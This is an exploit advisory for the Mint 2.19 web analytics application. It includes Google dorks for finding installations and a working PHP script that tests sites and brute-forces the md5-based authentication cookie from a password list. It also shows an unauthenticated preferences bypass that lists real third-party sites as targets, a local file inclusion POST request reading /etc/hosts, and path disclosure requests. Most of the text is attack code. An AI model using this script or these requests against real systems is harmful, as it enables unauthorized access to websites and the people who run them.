****************************************************************************** # App Name: Mint 2.19 # Google Dork(about 1,630,000 results): "Shaun Inman. All rights reserved." intitle:"Mint: " # Vendor Homepage: www.haveamint.com ******************************************************************************/ 1. Email verification bypass($_COOKIE and $_GET): Vulnerable Code(mint.php): Code: function isLoggedIn() { return (isset($_COOKIE['MintAuth']) && $_COOKIE['MintAuth']==md5($this->cfg['password']))?true:false; } POC: Code: <?php function TestError($host, $path) { $data = "GET ".$path."?preferences HTTP/1.0\r\n". "Host: ".$host."\r\n". // "UserAgent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1\r\n". // "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1\r\n". "Connection: close\r\n\r\n"; $socket = fsockopen($host, 80); fputs($socket, $data); $result = "is NOT vulnerable"; for($i=0;$i<16;$i++) if (strpos(fgets($socket), "Mint: Preferences")!=0) $result = "is VULNERABLE"; fclose($socket); echo "http://".$host.$path." - ".$result."\n"; return ($result=="is VULNERABLE")?true:false; } function Auth($pass, $host, $path) { $passhash = md5($pass); $data = "GET ".$path."?preferences HTTP/1.0\r\n". "Host: ".$host."\r\n". // "UserAgent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1\r\n". // "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1\r\n". "Cookie: MintAuth=".$passhash.";\r\n". "Connection: close\r\n\r\n"; $socket = fsockopen($host, 80); fputs($socket, $data); $result = "BAD"; for($i=0;$i<16;$i++) if (strpos(fgets($socket), "Mint: Preferences")!=0) $result = "GOOD"; fclose($socket); echo $pass." = ".$result."\n"; return ($result=="GOOD")?true:false; } switch($argv[1]) { case "-check": $host = $argv[2]; $path = $argv[3]; TestError($host, $path); break; case "-bruteforce": $host = $argv[2]; $path = $argv[3]; $passlist = $argv[4]; $file = fopen($passlist, "r"); if ($file!=NULL) { while (!feof($file)) { $current_password = str_replace("\r", '', (str_replace("\n", '', fgets($file)))); if (Auth($current_password, $host, $path)==true) { echo ">>>>>bruteforce SUCCESSFUL!!! (password=".$current_password.")\n"; exit(); } } fclose($file); echo ">>>>>bruteforce UNsuccessful :(\n"; } else echo "ERROR: ".$passlist." not found!\n"; break; default: echo "##### Mint 2.19 email verification bypass\n"; echo "##### Author: Unlog\n"; echo "##### Usage:\n". "\tmint.php -check www.example.com /mint/\n". "\tmint.php -bruteforce www.example.com /mint/ passlist.txt\n"; } ?> Additional Information: Same vulnerability in authenticateRSS function Vulnerable Code(mint.php): Code: function authenticateRSS() { return (isset($_GET['RSS']) && $_GET['RSS'] == md5($this->cfg['password']))?true:false; } POC: Same as above(with some modifications) 2. _Fatal error_ authentification bupass: Info: If there is some fatal error like _mysql server down_, no authentification is needed to access preferences Vulnerable Code(path.php): Code: if ($Mint->errors['fatal']) { include(MINT_ROOT.'app/paths/errors/index.php'); exit(); } Google Dork: "Mint was unable to connect" intitle:"Mint:" POC: Code: http://mint.ryanmccuaig.net/?preferences http://www.stunda.nl/mint/?preferences http://dejurka.ru/mint/?preferences http://www.mad4milk.net/mint/?preferences http://www.andrewgill.co.za/mint/?preferences 3. LFI in mint.php Info: LFI Requies access to preferences(can be obtained by using first or second exploit) Vulnerable Code: Code: mint.php: function installPepper($pathToPepper) { include_once(MINT_ROOT.$pathToPepper); ... \app\paths\preferences\index.php: if (isset($_POST['MintPath']) && $_POST['MintPath'] == 'Preferences') ... switch($_POST['action']) ... case 'Install Pepper': $Mint->tmp['pageTitle'] = 'Install Pepper'; $Mint->installPepper($_POST['src']); POC: Code: POST http://***/ HTTP/1.0 Host: ***.com UserAgent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1 Connection: Close Content-Type: application/x-www-form-urlencoded Content-length: 58 MintPath=Preferences&action=Install Pepper&src=/etc/hosts& 4. Multiple Full Path Disclosure Vulnerable Code: Code: if (!defined('MINT')) { header('Location:/'); }; // Prevent viewing this file POC: Code: GET http://localhost/mint/app/includes/foot.php?benchmark GET http://localhost/mint/app/includes/foot.php?observe GET http://localhost/mint/app/paths/auth/index.php GET http://localhost/mint/app/paths/custom/index.php?custom GET http://localhost/mint/app/paths/custom/index.php?RSS GET http://localhost/mint/app/paths/display/display.php GET http://localhost/mint/app/paths/display/index.php?tab GET http://localhost/mint/app/paths/errors/index.php GET http://localhost/mint/app/paths/feedback/index.php GET http://localhost/mint/app/paths/install/configuration.php GET http://localhost/mint/app/paths/install/instructions.php POST http://localhost/mint/app/paths/install/index.php | action=Activate POST http://localhost/mint/app/paths/install/index.php | action=Accept POST http://localhost/mint/app/paths/install/index.php | action=Configure and etc
